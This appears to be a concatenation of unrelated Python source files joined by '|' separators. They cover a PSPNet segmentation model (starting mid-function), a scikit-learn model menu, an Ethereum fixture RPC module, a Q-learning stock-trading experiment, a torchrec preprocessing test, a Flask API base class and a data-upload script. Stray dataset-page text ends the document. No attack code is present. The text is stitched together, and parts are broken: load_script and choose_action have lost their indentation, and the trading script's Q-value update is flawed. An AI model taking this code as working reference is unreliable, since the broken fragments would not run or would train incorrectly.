    x = Activation('relu')(x)
    # Upsample the pooled branch back to the input resolution.
    x = resize_image(x, strides, data_format=IMAGE_ORDERING)
    return x
def _pspnet(n_classes, encoder, input_height=384, input_width=576):
    """Assemble a PSPNet head on top of ``encoder`` and wrap it as a segmentation model."""
    assert input_height % 192 == 0
    assert input_width % 192 == 0

    img_input, levels = encoder(input_height=input_height, input_width=input_width)
    f1, f2, f3, f4, f5 = levels

    # Pyramid pooling: the raw deepest feature map plus one pooled branch
    # per pool factor, concatenated along the channel axis.
    x = f5
    branches = [x]
    for factor in [1, 2, 3, 6]:
        branches.append(pool_block(x, factor))
    x = Concatenate(axis=MERGE_AXIS)(branches)

    x = Conv2D(512, (1, 1), data_format=IMAGE_ORDERING, use_bias=False)(x)
    x = BatchNormalization()(x)
    x = Activation('relu')(x)

    # Per-class logits, then upsample by 8 in each spatial dimension.
    x = Conv2D(n_classes, (3, 3), data_format=IMAGE_ORDERING, padding='same')(x)
    x = resize_image(x, (8, 8), data_format=IMAGE_ORDERING)

    return get_segmentation_model(img_input, x)
def pspnet(n_classes, input_height=384, input_width=576):
    """PSPNet with the plain (vanilla) convolutional encoder."""
    net = _pspnet(n_classes, vanilla_encoder,
                  input_height=input_height, input_width=input_width)
    net.model_name = "pspnet"
    return net
def vgg_pspnet(n_classes, input_height=384, input_width=576):
    """PSPNet with a VGG16 encoder."""
    net = _pspnet(n_classes, get_vgg_encoder,
                  input_height=input_height, input_width=input_width)
    net.model_name = "vgg_pspnet"
    return net
def resnet50_pspnet(n_classes, input_height=384, input_width=576):
    """PSPNet with a ResNet-50 encoder."""
    net = _pspnet(n_classes, get_resnet50_encoder,
                  input_height=input_height, input_width=input_width)
    net.model_name = "resnet50_pspnet"
    return net
def pspnet_50(n_classes, input_height=473, input_width=473):
    """Pre-configured PSPNet-50 built via the alternate _pspnet_2 builder."""
    from ._pspnet_2 import _build_pspnet

    net = _build_pspnet(nb_classes=n_classes,
                        resnet_layers=50,
                        input_shape=(input_height, input_width))
    net.model_name = "pspnet_50"
    return net
def pspnet_101(n_classes, input_height=473, input_width=473):
    """Pre-configured PSPNet-101 built via the alternate _pspnet_2 builder."""
    from ._pspnet_2 import _build_pspnet

    net = _build_pspnet(nb_classes=n_classes,
                        resnet_layers=101,
                        input_shape=(input_height, input_width))
    net.model_name = "pspnet_101"
    return net
# def mobilenet_pspnet( n_classes , input_height=224, input_width=224 ):
# model = _pspnet( n_classes , get_mobilenet_encoder , input_height=input_height, input_width=input_width )
# model.model_name = "mobilenet_pspnet"
# return model
if __name__ == '__main__':
    # Smoke test: instantiate one model per encoder to check the graphs build.
    m = _pspnet( 101 , vanilla_encoder )
    # m = _pspnet( 101 , get_mobilenet_encoder ,True , 224 , 224 )
    m = _pspnet( 101 , get_vgg_encoder )
    m = _pspnet( 101 , get_resnet50_encoder )
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2017-2018 Jagoba Pérez-Gómez
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ml_algorithms.models import ModelTest
def select_option():
    """Print the model menu and return the user's numeric choice (1-8)."""
    menu = (
        '1. Linear',
        '2. Gaussian NB',
        '3. SVR',
        '4. Logistic Regression',
        '5. K Neighbours Classifier',
        '6. Decision Tree Classifier',
        '7. SVC',
        '8. Exit',
    )
    for line in menu:
        print(line)
    return int(input('Your selection [1-8]:'))
def load_script(model_test, option):
if option == 1:
model_test.test_linear()
elif option == 2:
model_test.test_gaussian_nb()
elif option == 3:
model_test.test_svr()
elif option == 4:
model_test.test_logistic_regression()
elif option == 5:
model_test.test_knn_classifier()
elif option == 6:
model_test.test_decision_tree_classifier()
elif option == 7:
model_test.test_svc()
if __name__ == '__main__':
    # Prepare the data set once, then keep prompting until the user picks
    # 8 (Exit); load_script silently ignores option 8.
    tester = ModelTest()
    tester.prepare_data_set()
    choice = 0
    while choice != 8:
        choice = select_option()
        load_script(tester, choice)
|
from typing import (
Any
)
from eth_utils import (
encode_hex,
)
from eth.chains.base import (
Chain
)
from eth.tools.fixture_tests import (
apply_fixture_block_to_chain,
new_chain_from_fixture,
normalize_block,
normalize_blockchain_fixtures,
)
from trinity.rpc.format import (
format_params,
)
from trinity.rpc.modules import (
RPCModule,
)
class EVM(RPCModule):
    """RPC module used by the blockchain-fixture test harness."""

    @format_params(normalize_blockchain_fixtures)
    def resetToGenesisFixture(self, chain_info: Any) -> Chain:
        '''
        This method is a special case. It returns a new chain object
        which is then replaced inside :class:`~trinity.rpc.main.RPCServer`
        for all future calls.
        '''
        return new_chain_from_fixture(chain_info)

    @format_params(normalize_block)
    def applyBlockFixture(self, block_info: Any) -> str:
        '''
        Import the fixture block into the chain held by this module and
        return the hex-encoded RLP of the imported block.

        (The previous docstring was copy-pasted from
        ``resetToGenesisFixture`` and did not describe this method.)
        '''
        _, _, rlp_encoded = apply_fixture_block_to_chain(block_info, self._chain)
        return encode_hex(rlp_encoded)
|
import pandas as pd
import datetime
from sklearn.linear_model import LinearRegression
from matplotlib import pyplot
import numpy as np
import random
#df.head()
#df.tail()
def rsi(df):
    """Append a 14-period Relative Strength Index column to ``df``.

    Day-over-day changes of the detrended price are split into gains and
    losses, smoothed with a simple 14-period rolling mean, and combined via
    the classic RSI formula.

    Returns
    -------
    DataFrame restricted to Date, Close, detrended_price_adj, RSI, Volume.
    '''first 14 rows are NaN until the rolling window fills'''
    """
    change = df['detrended_price_adj'].diff()
    gains = change.clip(lower=0)
    losses = change.clip(upper=0).abs()
    avg_gain = gains.rolling(14).mean()
    avg_loss = losses.rolling(14).mean()
    relative_strength = avg_gain / avg_loss
    df['RSI'] = 100.0 - (100.0 / (1.0 + relative_strength))
    return df[['Date', 'Close', 'detrended_price_adj', 'RSI', 'Volume']]
def macd(df):
    """Append MACD columns (12/26-span EMA difference plus 9-span signal line) to ``df``.

    Expects an ``RSI`` column to already exist (see ``rsi``), because it is
    included in the returned column selection.
    """
    ewm_kwargs = dict(adjust=True, ignore_na=True)
    df['ema_price_12'] = df['detrended_price_adj'].ewm(span=12, **ewm_kwargs).mean()
    df['ema_price_26'] = df['detrended_price_adj'].ewm(span=26, **ewm_kwargs).mean()
    df['macd'] = df['ema_price_12'] - df['ema_price_26']
    df['signal_line'] = df['macd'].ewm(span=9, **ewm_kwargs).mean()
    df['macd_diff_signal'] = df['macd'] - df['signal_line']
    return df[['Date', 'Close', 'macd', 'signal_line',
               'macd_diff_signal', 'Volume', 'RSI', 'detrended_price_adj']]
def parser(x):
    """Parse a two-part date like '1-01' into datetime(1901, 1, 1).

    BUG FIX: the module does ``import datetime`` (the module, not the
    class), so the original call ``datetime.strptime(...)`` raised
    AttributeError; the class must be reached via ``datetime.datetime``.
    """
    return datetime.datetime.strptime('190' + x, '%Y-%m')
# Load the raw price series.
# NOTE(review): the ``squeeze`` argument was removed from read_csv in
# pandas 2.0 — confirm the pinned pandas version or use .squeeze("columns").
series = pd.read_csv('POCs/RL/apple.csv', header=0, parse_dates=[0], index_col=0, squeeze=True)
series = series.reset_index()
# fit linear model of Close price against the row number (time index)
X = [i for i in range(0, len(series))]
X = np.reshape(X, (len(X), 1))
y = series.Close
model = LinearRegression()
model.fit(X, y)
# calculate trend
trend = model.predict(X)
# plot the raw series against the fitted linear trend
pyplot.plot(y)
pyplot.plot(trend)
pyplot.show()
# detrend: subtract the fitted trend to leave the residuals
detrended = [y[i]-trend[i] for i in range(0, len(series))]
# plot detrended
pyplot.plot(detrended)
pyplot.show()
# join the detrended residuals back onto the original frame by row index
detrended_df = pd.merge(series, pd.DataFrame(detrended), how='left', left_index=True, right_index=True)
detrended_df = detrended_df.rename(columns={0:'detrended_price'})
# shift the residuals up by |min| so every adjusted value is non-negative
detrended_df['detrended_price_adj'] = detrended_df['detrended_price'] + abs(detrended_df['detrended_price'].min())
df = rsi(detrended_df)
df = macd(df)
# plot the RSI and detrended adjusted price
df.plot('Date', ['detrended_price_adj','RSI']) # correlation makes sense still
df.plot('Date', ['detrended_price_adj','Close']) # comparing the detrended adjusted price to the closing price
# drop the first rows where the 14-period rolling windows are still NaN
df = df.iloc[15:].reset_index()
"""DONE"""
## clean up the code above to spit out clean data that the RL agent can work with
## define the states
## define the actions
## define the reward function
## define a function to identify the state the agent is
## define a function that lets the agent choose an action
## define the q-matrix and how to calculate it
## define the update the method
## add exploration vs. exploitation rate instead of randomly choosing at step 1 then basing off q-value
## add more states based on other indicators (added MACD)
## record the actions and plot out how it would look like in terms of $$ gains
## change reward function from -1, 0 and 1 to delta of today_price- yesterday_price
## add a decaying exploration function
# when exploring, choose any action that is not highest q-value
"""TO BE COMPLETED"""
## double check the reward and q_value calculation to make sure it works as intended
## add even more states based on other indicators
# add MACD movement direction (if MACD,t=0 < avg(MACD,t={-3:-1}), then MACD movement direction is down)
# add RSI movement direction (similar to MACD movement calculation above)
## add contraints (cant sell if there is no stock in holding)
## review the q_update calculation, potentially change it
def state_action_pair():
    """Build the initial Q-table: 8 RSI/MACD states x 3 actions (B/S/H), all zero."""
    rsi_bands = ['RSI<25', 'RSI<50', 'RSI<75', 'RSI<100']
    states = (['{} & MACD < 0'.format(band) for band in rsi_bands]
              + ['{} & MACD > 0'.format(band) for band in rsi_bands])
    q_table = pd.DataFrame({'states': states})
    for action in ('B', 'S', 'H'):
        q_table[action] = 0
    return q_table
def get_current_state(df, i):
    """Map row ``i`` of ``df`` to one of the 8 'RSI<x & MACD <|> 0' state labels.

    BUG FIX: the original ran two independent if-chains.  For any row with
    macd < 0 the second chain fell through to its ``else`` and printed
    'rsi unknown' even though the state had already been found, and for
    macd == 0 or rsi >= 100 the function raised UnboundLocalError.  Now
    macd == 0 is grouped with the non-negative ('MACD > 0') bucket and an
    out-of-range RSI raises ValueError explicitly.
    """
    rsi = df.iloc[i]['RSI']
    macd = df.iloc[i]['macd_diff_signal']
    if rsi < 25:
        band = 'RSI<25'
    elif rsi < 50:
        band = 'RSI<50'
    elif rsi < 75:
        band = 'RSI<75'
    elif rsi < 100:
        band = 'RSI<100'
    else:
        print('rsi unknown')
        raise ValueError('RSI out of range: {}'.format(rsi))
    side = 'MACD < 0' if macd < 0 else 'MACD > 0'
    return '{} & {}'.format(band, side)
def choose_action(q_table, rsi_state, epsilon):
# at first iteration, always randomly pick an action
if q_table.loc[rsi_state]['B']==q_table.loc[rsi_state]['H']==q_table.loc[rsi_state]['S']:
action_choice = random.choice(['B','H','S'])
print('chosen randomly ', action_choice)
action_choice_type = '1st run, random'
# at any subsequent iteration, either explore (with p = eps) or exploit highest q-value (with p=1-eps)
else:
random_ = random.uniform(0,1)
if random_ < epsilon:
max_value_choice = q_table.loc[rsi_state].idxmax(axis=1)
action_list = ['B','H','S']
refined_action_list = [value for value in action_list if value != max_value_choice]
action_choice = random.choice(refined_action_list)
action_choice_type = 'exploring, not 1st run'
print('action ', action_choice, ' chosen randomly, random prob: ', random_, ' epsilon: ', epsilon)
else:
action_choice = q_table.loc[rsi_state].idxmax(axis=1)
action_choice_type = ' q_value based'
print('action ', action_choice, ' chosen based on q-value, random prob: ', random_, ' epsilon: ', epsilon)
return action_choice, action_choice_type
# At EOD of the trading day, calculate the reward of the action taken at the beginnning of the day
def get_reward(df, i, j):
    """Reward for the step from row ``j`` to row ``i``: the detrended price delta.

    The original three-way if/elif returned the same thing in every branch
    (the difference when prices differ, 0 when equal), so it collapses to a
    single subtraction.  Note: with NaN prices the original fell off the end
    and returned None; the plain delta lets NaN propagate instead.
    """
    recent_price = df[df.index == i]['detrended_price_adj'].values[0]
    old_price = df[df.index == j]['detrended_price_adj'].values[0]
    return recent_price - old_price
## function creates a table with default value of 0.9 for epsilon for each state specified in the q_table
def decaying_epsilon_table(q_table):
    """Create a per-state exploration-rate table, initialised to 0.90 for every state."""
    table = pd.DataFrame({'states': list(q_table.index)})
    table['decaying eps'] = 0.90
    return table
## function renders the most recent decayed epsilon rate for a given state and its row index
def get_decaying_eps_rate(rsi_state, decay_eps_table):
    """Return (current epsilon, row index) for ``rsi_state`` in the decay table."""
    mask = decay_eps_table['states'] == rsi_state
    current_eps = decay_eps_table.loc[mask, 'decaying eps'].values[0]
    current_eps_index = decay_eps_table.index[mask][0]
    return current_eps, current_eps_index
## function updates the given current epsilon value by multiplying by 0.999 therefore gradually decreasing it to ensure
## adequate exposure to different environments for each pre-specified state
def update_decaying_eps_rate(current_eps, current_eps_index, decay_eps_table):
    """Decay one state's stored epsilon by a factor of 0.975 (in place) and return the table."""
    decayed = current_eps * 0.975
    decay_eps_table.at[current_eps_index, 'decaying eps'] = decayed
    return decay_eps_table
q_table = state_action_pair()
q_table = q_table.set_index('states')

# Learning rate and discount factor for the Q-value update.
ALPHA = 0.8
GAMMA = 0.5

pd.options.display.float_format = '{:.4f}'.format
pd.set_option('display.max_columns', 500)

# BUG FIX: the columns were passed as a set, which has no defined order;
# use a list so the action-history table has a stable column layout.
historical_action_table = pd.DataFrame(columns=['date', 'state', 'action', 'reward',
                                                'price', 'action_choice', 'epsilon'])
decay_eps_table = decaying_epsilon_table(q_table)

for i in range(1, 1256):
    j = i - 1
    # Reward realised at end of day i relative to day j.
    reward = get_reward(df, i, j)
    rsi_state = get_current_state(df, i)
    print('the state is ', rsi_state)
    current_eps, current_eps_index = get_decaying_eps_rate(rsi_state, decay_eps_table)
    print(current_eps, current_eps_index)
    update_decaying_eps_rate(current_eps, current_eps_index, decay_eps_table)
    print(decay_eps_table)
    action_choice, action_choice_type = choose_action(q_table, rsi_state, current_eps)
    old_q_value = q_table.loc[rsi_state, action_choice]
    print('old q_value is ', old_q_value)
    # NOTE(review): standard Q-learning would use the max Q of the *next*
    # state here; this update reuses the current cell's own value — the
    # file's own TODO list flags this for review, confirm it is intended.
    new_q_value = old_q_value + ALPHA * (reward + GAMMA * old_q_value)
    print('new q_value is ', new_q_value)
    q_table.loc[rsi_state, action_choice] = new_q_value
    print(q_table)
    # BUG FIX: DataFrame.append was removed in pandas 2.0; build a one-row
    # frame and concatenate instead.
    new_row = pd.DataFrame([{'date': str(df[df.index == i]['Date'].values[0])[:10],
                             'state': rsi_state, 'action': action_choice,
                             'reward': reward, 'price': df[df.index == i]['Close'].values[0],
                             'action_choice': action_choice_type, 'epsilon': current_eps}])
    historical_action_table = pd.concat([historical_action_table, new_row],
                                        ignore_index=True)
    print('--------------------------------------------')
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import os
import tempfile
import unittest
import numpy as np
from torchrec.datasets.criteo import CAT_FEATURE_COUNT, INT_FEATURE_COUNT
from torchrec.datasets.scripts.npy_preproc_criteo import main
from torchrec.datasets.test_utils.criteo_test_utils import CriteoTest
class MainTest(unittest.TestCase):
    """End-to-end test of the Criteo npy preprocessing script's main()."""

    def test_main(self) -> None:
        # Build a tiny synthetic day_0 TSV, run the preprocessor over its
        # directory, and verify the three emitted .npy arrays have the
        # expected shapes.
        num_rows = 10
        name = "day_0"
        with CriteoTest._create_dataset_tsv(
            num_rows=num_rows,
            filename=name,
        ) as in_file_path, tempfile.TemporaryDirectory() as output_dir:
            main(
                [
                    "--input_dir",
                    os.path.dirname(in_file_path),
                    "--output_dir",
                    output_dir,
                ]
            )
            # main() writes <name>_dense.npy / _sparse.npy / _labels.npy
            # into output_dir.
            dense = np.load(os.path.join(output_dir, name + "_dense.npy"))
            sparse = np.load(os.path.join(output_dir, name + "_sparse.npy"))
            labels = np.load(os.path.join(output_dir, name + "_labels.npy"))
            self.assertEqual(dense.shape, (num_rows, INT_FEATURE_COUNT))
            self.assertEqual(sparse.shape, (num_rows, CAT_FEATURE_COUNT))
            self.assertEqual(labels.shape, (num_rows, 1))
|
from ..ServiceCore import Service
from .IAPICore import IAPI
from .routing.Router import Router
from ...conf.API.apis.APICoreConfig import APICoreConfig
from ...util.api.validators.InternalAPIValidators import InternalAPIValidator
from ...util.app.ErrorFactory.api.ArgumentValidation import ArgumentRequired,InvalidArgumentProvideed
from .IAPICore import IAPIArg
from ...util.Logging.LogFactory import LogFactory
from ...util.api.decorators.http import http_logger
# Flask framework imports
from flask_restplus import Namespace, Resource, model, fields
from flask import request
class APIArg(IAPIArg):
    """Concrete API argument: a name plus the Python type its value must have."""

    def __init__(self, arg, dataType):
        super().__init__(arg,dataType)
        # Also stored locally; presumably IAPIArg.__init__ already keeps
        # these — TODO confirm and drop the duplication.
        self.arg=arg
        self.dataType=dataType
class API(IAPI):
    """Base Flask-RESTPlus API wrapper.

    Wires the API config, routing, logging and input validation together
    and builds the flask_restplus Namespace/Resource objects.
    """

    #region Constructor
    def __init__(self,apiConfig: APICoreConfig,services: [Service],inputValidation: InternalAPIValidator):
        # Responses this API advertises; starts empty (populated elsewhere).
        self._supported_api_responses=[]
        self.namespace_object:Namespace=None
        self._service_config=apiConfig
        self._setup_service_logger()
        self._build_api_models()
        super().__init__(
            apiConfig=apiConfig,
            services=services,
            inputValidation=inputValidation)
        self.api_validation=inputValidation
    #endregion

    #region Private Methods
    def _setup_service_logger(self):
        """Create this API's logger from the configured log file and level."""
        self.log=LogFactory(file=self._service_config.log_file,
            log_level=self._service_config.log_level)

    # Constructs a Flask Namespace object named after the resource route.
    def _build_namespace(self)->None:
        self.namespace_object=Namespace(
            name=self.build_resource_route(),
            description=self.api_config().api_namespace_description)

    def _build_router(self)->None:
        """Build the Router from the router section of the API config."""
        self.route_manager=Router(routerConfig=self
            .api_config()
            .router_config())

    # TODO: model registration is not implemented — both branches return
    # without building anything.
    def _build_api_models(self):
        if self._service_config.expected_models is None:
            return
        else:
            return
    #endregion

    #region Public Methods
    def payload_to_tuple_helper(self, payload: {})->tuple:
        """Flatten a payload dict's values into a tuple (in key iteration order)."""
        t = tuple()
        for key in payload.keys():
            p=payload[key]
            t2=(p,)
            t = t + t2
        return t

    def validate_required_args(self,req: [APIArg], passed_args: {}):
        """Check each required arg is present in ``passed_args`` with the right type.

        Raises ArgumentRequired when an argument is missing and
        InvalidArgumentProvideed (sic — typo lives in the imported error
        class) when its type does not match exactly.
        """
        for required_arg in req:
            if passed_args is None or required_arg.arg not in passed_args.keys():
                raise ArgumentRequired(
                    arg=required_arg.arg
                )
            elif type(passed_args[required_arg.arg]) != required_arg.dataType:
                raise InvalidArgumentProvideed(
                    arg=required_arg.arg,
                    expectedDataType=required_arg.dataType
                )

    def api_config(self)->APICoreConfig:
        """Return the APICoreConfig this API was constructed with."""
        return self._service_config

    def build_resource_route(self)->str:
        """Compose '<core route>/<resource>' for this API's namespace path."""
        return(f"{self.route_manager.core_route}/"
            f"{self.route_manager.api_specific_resource}")
        #f"{self.route_manager.api_specific_routes}")
    #endregion

    #region API Resource Builder
    # Registers a Resource class on the namespace with documented (but
    # currently unimplemented) GET/POST/PATCH/DELETE handlers.
    def build_api_resource(self)->Namespace:
        APIReference = self
        @APIReference.namespace_object.route(APIReference.build_resource_route())
        class API_Resource(Resource):
            #@APIReference.namespace_object.route(f"{APIReference.build_resource_route()}/{APIReference.route_manager.api_specific_routes['get']}")
            @APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["get"])
            def get(self):
                pass
            @APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["post"])
            def post(self):
                pass
            @APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["patch"])
            def patch(self):
                pass
            @APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["delete"])
            def delete(self):
                pass
        return APIReference.namespace_object
    #endregion
#endregion
|
#!{PYTHON}
# example syntax: data_access_put_s2_l2.py /data/mx/sdrs
from multiply_data_access import DataAccessComponent
import logging
import os
import sys
logger = logging.getLogger('ScriptProgress')
logger.setLevel(logging.INFO)
# NOTE(review): no handler is attached here, so INFO records are dropped by
# logging's last-resort handler (WARNING level) — confirm the caller
# configures logging, or add logging.basicConfig(level=logging.INFO).

# setup parameters
configuration_file = sys.argv[1]
start_date = sys.argv[2]
stop_date = sys.argv[3]
sdrs_dir = sys.argv[4]
provided_sdrs_dir = sys.argv[5]

dac = DataAccessComponent()
sdrs = os.listdir(sdrs_dir)
for i, sdr in enumerate(sdrs):
    # BUG FIX: the upper bound was 'i + 1/len(sdrs)' (i plus a small
    # fraction) because of operator precedence; parenthesise (i + 1) so the
    # message reports the true 'start%-end%' progress window.
    logger.info(f'{int((i / len(sdrs)) * 100)}-{int(((i + 1) / len(sdrs)) * 100)}')
    # Only upload SDRs that have not already been provided.
    if not os.path.exists(os.path.join(provided_sdrs_dir, sdr)):
        dac.put(os.path.join(sdrs_dir, sdr), 'S2L2')
logger.info('100-100')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.